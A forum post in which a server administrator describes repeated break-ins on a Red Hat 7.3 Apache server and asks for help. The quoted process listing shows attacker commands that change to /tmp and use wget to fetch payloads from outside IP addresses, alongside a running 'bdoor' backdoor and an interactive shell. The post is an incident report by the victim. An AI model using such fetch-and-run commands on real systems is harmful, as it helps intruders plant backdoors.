Server Repeatedly hacked - writes and executes files from /tmp

My Server is being compromised thrice by the same Hacker during the past 10 days, i had gone for a re-kickstart last week and migrated from RH7.1 to 7.3 on a fresh HDD, however the same hacker has managed to intrude and followed the following same pattern each time.

I notice the following files written in /tmp folder by the hacker;
-rwxr-xr-x 1 apache apache 14817 Mar 8 12:02 bdoor
-rw-r--r-- 1 apache apache 1403 Feb 18 17:58 bdoor.c
-rwxr-xr-x 1 apache apache 128040 Mar 8 10:05 ssl

The following processes were running when i noticed first;

apache 18042 0.0 0.2 1888 856 ? S 10:57 0:00 sh -c cd /tmp;echo;wget http://200.140.13.250:80

apache 18079 0.0 0.2 1888 856 ? S 10:58 0:00 sh -c cd /tmp;echo;wget http://200.163.8.74:8080

apache 18087 25.0 0.3 2504 1304 ? R 10:58 18:01 -ash -i

apache 18232 0.0 0.0 1272 268 ? S 11:02 0:00 ./bdoor

I am on;
Red Hat Linux release 7.3 (Valhalla)
apache-1.3.27-2

We keep shell access disabled always, and php file_uploads = Off.

Also, the following SSL packages are there, i don't think i am using SSL and if my server needs these;

mod_ssl-2.8.12-2
openssl096-0.9.6-13
openssl-0.9.6b-28
openssl-devel-0.9.6b-28
openssl095a-0.9.5a-18
openssl-perl-0.9.6b-28

I have no idea what the above files/process would have done or how they have damaged my server.

The same hacker has been repeated intruding my server. I think this is an SSL hole, my server provider are unable to fix this.


Please help asap.

Thanks,
Viv

 

 

 

 

Top